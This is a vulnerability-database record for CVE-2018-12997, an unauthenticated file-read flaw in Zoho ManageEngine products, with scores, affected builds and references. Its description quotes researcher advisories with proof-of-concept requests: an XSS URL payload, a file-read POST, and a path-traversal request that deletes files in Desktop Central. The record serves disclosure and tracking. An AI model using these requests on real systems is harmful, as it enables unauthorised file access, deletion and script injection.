var-201806-1163
Vulnerability from variot
Incorrect Access Control in FailOverHelperServlet in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows attackers to read certain files on the web server without login by sending a specially crafted request to the server with the operation=copyfile&fileName= substring. plural Zoho ManageEngine The product contains an information disclosure vulnerability.Information may be obtained. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. FailOverHelperServlet in many ZOHO products has an access control error vulnerability. This issue has been reported to the vendor who has already published patches for this issue. https://www.manageengine.com/products/applications_manager/issues.html
========================== Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability Author: M3 From DBAppSecurity Affected Version: All ========================== Proof of Concept: ========================== /GraphicalView.do?method=createBusinessService"scriptalert(5045)/script
Notice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. http://opmanager.helpdocsonline.com/read-me
========================== Advisory:Zoho manageengine Arbitrary File Read in multiple Products Author: M3 From DBAppSecurity Affected Products: Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer ========================== Proof of Concept: ========================== POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx
Notice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.
========================== Advisory: Zoho manageengine Desktop Central Arbitrary File Deletion Author: M3 From DBAppSecurity Affected Products:Desktop Central ========================== Proof of Concept: ==========================
POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif
Notice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "firewall analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine netflow analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine opmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine network configuration manager",
"scope": "eq",
"trust": 1.0,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine oputils",
"scope": "eq",
"trust": 1.0,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine firewall analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123147"
},
{
"_id": null,
"model": "manageengine netflow analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123137"
},
{
"_id": null,
"model": "manageengine network configuration manager",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123128"
},
{
"_id": null,
"model": "manageengine opmanager",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123148"
},
{
"_id": null,
"model": "manageengine oputils",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123161"
},
{
"_id": null,
"model": "network configuration manager",
"scope": "eq",
"trust": 0.6,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "oputils",
"scope": "eq",
"trust": 0.6,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "opmanager",
"scope": "eq",
"trust": 0.6,
"vendor": "zohocorp",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:zohocorp:manageengine_firewall_analyzer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:zohocorp:manageengine_netflow_analyzer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:zohocorp:network_configuration_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:zohocorp:manageengine_opmanager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:zohocorp:oputils",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
}
]
},
"credits": {
"_id": null,
"data": "Xiaotian Wang",
"sources": [
{
"db": "PACKETSTORM",
"id": "148635"
}
],
"trust": 0.1
},
"cve": "CVE-2018-12997",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-12997",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-123012",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-12997",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-12997",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-12997",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-12997",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-037",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-123012",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
}
]
},
"description": {
"_id": null,
"data": "Incorrect Access Control in FailOverHelperServlet in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows attackers to read certain files on the web server without login by sending a specially crafted request to the server with the operation=copyfile\u0026fileName= substring. plural Zoho ManageEngine The product contains an information disclosure vulnerability.Information may be obtained. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. FailOverHelperServlet in many ZOHO products has an access control error vulnerability. This issue has been reported to the vendor who has already published patches for this issue. \nhttps://www.manageengine.com/products/applications_manager/issues.html\n\n\n==========================\nAdvisory:Zoho manageengine Applications Manager Reflected XSSVulnerability\nAuthor: M3 From DBAppSecurity\nAffected Version: All\n==========================\nProof of Concept:\n==========================\n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script\n\n\nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me\n\n\n==========================\nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products\nAuthor: M3 From DBAppSecurity\nAffected Products:\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\n==========================\nProof of Concept:\n==========================\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx\n\n\nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. \n\n\n\n\n==========================\nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion\nAuthor: M3 From DBAppSecurity\nAffected Products:Desktop Central\n==========================\nProof of Concept:\n==========================\n\n\nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif\n\n\nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-12997"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "PACKETSTORM",
"id": "148635"
}
],
"trust": 1.8
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2018-12997",
"trust": 2.6
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037",
"trust": 2.3
},
{
"db": "PACKETSTORM",
"id": "148635",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784",
"trust": 0.8
},
{
"db": "VULHUB",
"id": "VHN-123012",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "PACKETSTORM",
"id": "148635"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
}
]
},
"id": "VAR-201806-1163",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T21:53:01.715000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.manageengine.com/"
},
{
"title": "Multiple ZOHO Product access control error vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81656"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.5,
"url": "https://github.com/unh3x/just4cve/issues/8"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2018/jul/73"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/148635/zoho-manageengine-13-13790-build-xss-file-read-file-deletion.html"
},
{
"trust": 1.7,
"url": "http://www.cnnvd.org.cn/web/xxk/ldxqbyid.tag?cnnvd=cnnvd-201807-037"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12997"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12997"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12999"
},
{
"trust": 0.1,
"url": "https://www.manageengine.com/products/applications_manager/issues.html"
},
{
"trust": 0.1,
"url": "http://opmanager.helpdocsonline.com/read-me"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12996"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12998"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "PACKETSTORM",
"id": "148635"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-123012",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "148635",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2018-12997",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2018-06-29T00:00:00",
"db": "VULHUB",
"id": "VHN-123012",
"ident": null
},
{
"date": "2018-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006784",
"ident": null
},
{
"date": "2018-07-22T17:22:56",
"db": "PACKETSTORM",
"id": "148635",
"ident": null
},
{
"date": "2018-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-037",
"ident": null
},
{
"date": "2018-06-29T12:29:00.437000",
"db": "NVD",
"id": "CVE-2018-12997",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "VULHUB",
"id": "VHN-123012",
"ident": null
},
{
"date": "2018-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006784",
"ident": null
},
{
"date": "2021-09-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-037",
"ident": null
},
{
"date": "2024-11-21T03:46:13.037000",
"db": "NVD",
"id": "CVE-2018-12997",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "plural Zoho ManageEngine Information disclosure vulnerability in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.